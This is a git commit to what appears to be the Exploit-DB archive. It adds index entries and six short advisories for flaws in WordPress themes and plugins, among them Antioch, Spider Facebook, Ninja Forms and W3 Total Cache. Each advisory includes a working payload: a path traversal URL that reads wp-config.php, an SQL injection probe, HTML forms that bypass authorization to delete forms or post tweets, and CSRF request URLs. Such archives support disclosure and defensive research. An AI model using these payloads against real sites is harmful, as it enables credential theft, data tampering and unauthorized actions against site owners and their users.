DB: 2016-01-25

6 new exploits
This commit is contained in:
Offensive Security 2016-01-25 05:02:02 +00:00
parent 73e749c845
commit 5f07a690c4
7 changed files with 73 additions and 0 deletions

View file

@ -35539,3 +35539,9 @@ id,file,description,date,author,platform,type,port
39296,platforms/php/webapps/39296.txt,"WordPress Urban City Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
39297,platforms/php/webapps/39297.txt,"WordPress Authentic Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
39299,platforms/php/webapps/39299.txt,"WordPress Antioch Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
39300,platforms/php/webapps/39300.txt,"WordPress Spider Facebook Plugin 'facebook.php' SQL Injection Vulnerability",2014-09-07,"Claudio Viviani",php,webapps,0
39301,platforms/php/webapps/39301.html,"WordPress Ninja Forms Plugin Authorization Bypass Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
39302,platforms/php/webapps/39302.html,"WordPress WP to Twitter Plugin Authorization Bypass Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
39303,platforms/php/webapps/39303.txt,"WordPress Xhanch My Twitter Plugin Cross Site Request Forgery Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
39304,platforms/php/webapps/39304.txt,"WordPress W3 Total Cache Plugin 'admin.php' Cross Site Request Forgery Vulnerability",2014-09-08,Voxel@Night,php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/69673/info
Antioch theme for Wordpress is prone to an arbitrary file-download vulnerability.
An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information.
http://www.example.com/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/69675/info
Spider Facebook plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Spider Facebook 1.0.8 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-admin/admin.php?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 and 1=2

View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/69740/info
The Ninja Forms Plugin for WordPress is prone to an authorization-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.
Ninja Forms Plugin 2.7.7 is vulnerable; other versions may also be affected.
<html><body>
<form action="http://www.example.com/wordpress/wp-admin/admin-ajax.php" method="POST">
form id: <input name="form_id" value="1"><br>
action: <input name="action" value="ninja_forms_delete_form">
<input type="submit" value="submit">
</form>
</body></html>

View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/69741/info
WP to Twitter Plugin for WordPress is prone to an authorization-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.
WP to Twitter 2.9.3 is vulnerable; other versions may also be affected.
<html><body>
<form method="post" action="http://www.example.com/wordpress/wp-admin/admin-ajax.php">
action:<input name="action" value="wpt_tweet"><br>
tweet action:<input name="tweet_action" value="tweet"><br>
tweet text: <input value="" name="tweet_text"><br>
tweet schedule: <input value="undefined+undefined" name="tweet_schedule"><br>
tweet post id: <input value="1" name="tweet_post_id"><br>
<input type="submit" value="Submit">
</form>
</body></html>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/69744/info
Xhanch My Twitter plugin for WordPress is prone to a cross-site request-forgery vulnerability.
An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
Xhanch My Twitter 2.7.7 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/?xmt_Primary_twt_id=508351521810300928

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/69745/info
W3 Total Cache plugin for WordPress is prone to a cross-site request-forgery vulnerability.
An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
W3 Total Cache 0.9.4 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-admin/admin.php?page=w3tc_general&w3tc_note=enabled_edge